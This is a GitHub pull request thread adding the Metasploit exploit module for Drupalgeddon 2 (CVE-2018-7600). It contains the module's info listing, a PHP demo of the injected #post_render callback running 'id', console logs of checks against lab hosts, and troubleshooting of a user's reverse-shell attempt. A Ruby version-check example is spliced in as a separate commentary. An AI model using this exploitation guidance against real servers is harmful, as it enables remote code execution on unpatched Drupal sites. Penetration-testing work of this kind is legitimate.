
Add Drupal Drupalgeddon 2 #9876

Merged
merged 26 commits into from Apr 25, 2018

Conversation

@wvu-r7
Contributor

wvu-r7 commented Apr 13, 2018

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > info

       Name: Drupal Drupalgeddon 2 Forms API Property Injection
     Module: exploit/unix/webapp/drupal_drupalgeddon2
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-03-28

Provided by:
  Jasper Mattsson
  a2u
  Nixawk
  FireFart
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (PHP In-Memory)
  1   Automatic (PHP Dropper)
  2   Automatic (Unix In-Memory)
  3   Automatic (Linux Dropper)
  4   Drupal 7.x (PHP In-Memory)
  5   Drupal 7.x (PHP Dropper)
  6   Drupal 7.x (Unix In-Memory)
  7   Drupal 7.x (Linux Dropper)
  8   Drupal 8.x (PHP In-Memory)
  9   Drupal 8.x (PHP Dropper)
  10  Drupal 8.x (Unix In-Memory)
  11  Drupal 8.x (Linux Dropper)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        If output should be dumped
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.
  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.

References:
  https://cvedetails.com/cve/CVE-2018-7600/
  https://www.drupal.org/sa-core-2018-002
  https://greysec.net/showthread.php?tid=2912
  https://research.checkpoint.com/uncovering-drupalgeddon-2/
  https://github.com/a2u/CVE-2018-7600
  https://github.com/nixawk/labs/issues/19
  https://github.com/FireFart/CVE-2018-7600
  Also known as: SA-CORE-2018-002
  Also known as: Drupalgeddon 2

msf5 exploit(unix/webapp/drupal_drupalgeddon2) >

Resolves #9789.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch 11 times, most recently from 3897d04 to 50f8058 Apr 13, 2018

@wvu-r7 wvu-r7 added the needs-docs label Apr 14, 2018

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch 11 times, most recently from bced7e2 to 6838a4e Apr 14, 2018

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/drupal branch from 6838a4e to d8508b8 Apr 14, 2018

@nixawk

Contributor

nixawk commented Apr 14, 2018

A php demo is prepared for exp tests. It shows how to exploit CVE-2018-7600.

root@lab:~# php /tmp/bug.php passthru id
PHP Warning:  Parameter 2 to passthru() expected to be a reference, value given in /tmp/bug.php on line 38
PHP Stack trace:
PHP   1. {main}() /tmp/bug.php:0
PHP   2. drupal_cve_2018_7600() /tmp/bug.php:45
uid=0(root) gid=0(root) groups=0(root)


root@lab:~# php /tmp/bug.php printf drupal
drupal6

<?php

// Author: Nixawk
// CVE-2018-7600: Unsanitized requests allow remote attackers to execute arbitrary code

// Usage:
// $ php drupal-rce-php.php passthru id

function drupal_cve_2018_7600($func, $param)
{
    $elements = array(
        "#markup" => "{Drupal\Core\Render\Markup}",
        "#type"   => "markup",
        "#post_render" => array(
            0 => $func
        ),
        "#suffix" => "<span class=\"ajax-new-content\"></span>",
        "#prefix" => "",
        "#cache"  => array(
            "contexts" => array(
                0 => "languages:language_intreface",
                1 => "theme",
                2 => "user.permissions"
            ),
            "tags" => array(),
            "max-age" => -1
        ),
        "#defaults_loaded" => true,
        "#attached" => array(),
        "#children" => array(
            "string" => $param
        )
    );

    // echo $elements['#children']["string"] . "\n";

    $elements['#children']["string"] = call_user_func(
        // $callable = $elements["#post_render"]["0"];
        $elements["#post_render"]["0"],
        $elements['#children']["string"],
        $elements
    );

    echo $elements['#children']["string"] . "\n";
}

drupal_cve_2018_7600($argv[1], $argv[2]);

?>

@alfonsocaponi


alfonsocaponi commented Apr 26, 2018

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal
TARGETURI => /drupal
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[-] Could not determine Drupal version to target
[*] 192.168.253.129:80 Cannot reliably check exploitability.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set TARGETURI /drupal/
TARGETURI => /drupal/
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://192.168.253.129/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[+] 192.168.253.129:80 The target is vulnerable.

@bcoles

Contributor

bcoles commented Apr 26, 2018

@alfonsocaponi that makes sense. At a guess, /drupal is returning a 302 redirect to /drupal/.

check does not follow redirects.

@alfonsocaponi


alfonsocaponi commented Apr 26, 2018

@bcoles according to you, could it be useful to add an option about redirects? :)

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2018

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2018

@wvu-r7

Contributor

wvu-r7 commented Apr 26, 2018

@alfonsocaponi: Happy to make the change.

@wvu-r7

Contributor

wvu-r7 commented Apr 26, 2018

Hmm, it'll be more complicated than that. Reactively writing in send_request_cgi! is not a practice I want to perpetuate. I'm investigating a better way.

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 3, 2018

Fix rapid7#9876, second round of Drupalgeddon 2 updates
Thanks to a reviewer for noticing my drupal_unpatched? method was
tri-state because of an unrefactored return. Oops! :)
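
The tri-state bug named in the commit message, and the vulnerable version ranges from the module description, as an added Ruby example (not the module's own code; the function names, the `Drupal X.Y[.Z], date` header regex and the sample changelog heads are my assumptions): a `drupal_unpatched?` predicate that reads the version line of CHANGELOG.txt, compares it against the listed ranges and always returns a boolean, next to the nil-leaking shape it replaces.

```ruby
require 'rubygems' # Gem::Version (stdlib) does the version comparisons
# Vulnerable ranges as listed in the module description:
#   Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, < 8.5.1
# ("< 8.3.9" already covers every 8.0.x, 8.1.x and 8.2.x release.)
def drupal_vulnerable_version?(version)
  v = Gem::Version.new(version)
  major, minor = v.segments
  case major
  when 6 then true
  when 7 then v < Gem::Version.new('7.58')
  when 8
    v < Gem::Version.new('8.3.9') ||
      (minor == 4 && v < Gem::Version.new('8.4.6')) ||
      (minor == 5 && v < Gem::Version.new('8.5.1'))
  else false
  end
rescue ArgumentError # malformed version string
  false
end

# First "Drupal X.Y[.Z], YYYY-MM-DD" header in a CHANGELOG.txt body, or nil
# (assumed header format; hypothetical helper name)
def drupal_changelog_version(changelog)
  m = changelog.match(/^Drupal (\d+\.\d+(?:\.\d+)?),/)
  m && m[1]
end

# The shape the commit message warns about: a bare `return` yields nil, so the
# predicate answers true / false / nil and `== false` callers misfire.
def drupal_unpatched_tristate(changelog)
  version = drupal_changelog_version(changelog)
  return unless version
  drupal_vulnerable_version?(version)
end

# Refactored: every path yields true or false; an unreadable version counts as
# "not shown unpatched" and the caller decides whether that is Unknown or Safe.
def drupal_unpatched?(changelog)
  version = drupal_changelog_version(changelog)
  !version.nil? && drupal_vulnerable_version?(version)
end

# Constructed sample CHANGELOG.txt heads (not real Drupal changelogs)
SAMPLE_CHANGELOG_D7 = "Drupal 7.57, 2018-02-21\n-----------------------\n- Maintenance release.\n"
SAMPLE_CHANGELOG_D8 = "Drupal 8.5.1, 2018-03-28\n------------------------\n- Security release.\n"
if __FILE__ == $PROGRAM_NAME
  p drupal_unpatched?(SAMPLE_CHANGELOG_D7)       # true
  p drupal_unpatched_tristate('no version line') # nil: the tri-state leak
end
```

Pushing the "version not found" case out of the predicate is what makes it boolean again; the check method, not the predicate, is the place to turn that case into an Unknown rather than a Safe verdict.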

@wvu-r7

Contributor

wvu-r7 commented May 3, 2018

Bah, it's catching my rebases. It's always a mistake to reference a PR in a commit. :/

@wvu-r7

Contributor

wvu-r7 commented May 3, 2018

@alfonsocaponi: See if the latest code works for you. Thanks.

@wvu-r7

Contributor

wvu-r7 commented May 3, 2018

All right, I've committed what I hope to be my final revision to the module. Happy hunting. Bug reports welcome.

@user124567


user124567 commented Jun 3, 2018

Hi - I have been trying to exploit a Raspbian/LAMP/Drupal 8.5.0 install without success - any ideas why? Below is the output - thanks for any help!

[*] Started reverse TCP handler on 192.168.152.128:4444
[*] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 8237hWucIsyWIFYCWi8sDn9eRbsTlaOK2r
[*] Executing with assert(): (base64 payload omitted)
[*] Executing with passthru(): (base64 payload omitted)
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 8 targeted at http://192.168.1.104/drupal/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Executing with printf(): 8sU6NkT0h7ZMtNZa6cbk1P1EARQFWROBfg0W6re
[+] 192.168.1.104:80 The target is vulnerable.

@wvu-r7

Contributor

wvu-r7 commented Jun 3, 2018

@user124567: Are you sure your payload settings are correct? The payload can connect back? Also, it's possible there's no PHP CLI, or perhaps passthru() was disabled (you can change the PHP_FUNC option). Clearly assert() did not work. I suggest giving cmd/unix/generic a try and seeing if you can get shell output.

@user124567


user124567 commented Jun 4, 2018

Thanks for taking the time to reply. I have checked that PHP CLI is installed and passthru is enabled. cmd/unix/generic doesn't run (not a compatible payload), but I tried all the available options without success as well, also with php_func = exec.

I have the exploit running well against an Intel CPU install we have, but not the Raspberry Pi install. Again, grateful for any suggestions. Thanks.

@wvu-r7

Contributor

wvu-r7 commented Jun 4, 2018

If cmd/unix/generic is not a compatible payload, your target is wrong. Select a Unix In-Memory target. Btw, if you have a bug, don't comment on the PR: create a new issue. If you require support, please ask us on IRC or via e-mail (msfdev@metasploit.com works).

@wvu-r7

Contributor

wvu-r7 commented Jun 4, 2018

Happy to wrap up debugging this with you here, though. :)

@wvu-r7

Contributor

wvu-r7 commented Jun 4, 2018

Next thing I would suggest is using strace to verify command injection is possible. I'd give your php.ini a once-over, too.

@wvu-r7 wvu-r7 referenced this pull request Jul 5, 2018

Merged

Add GitList argument injection exploit module #10262
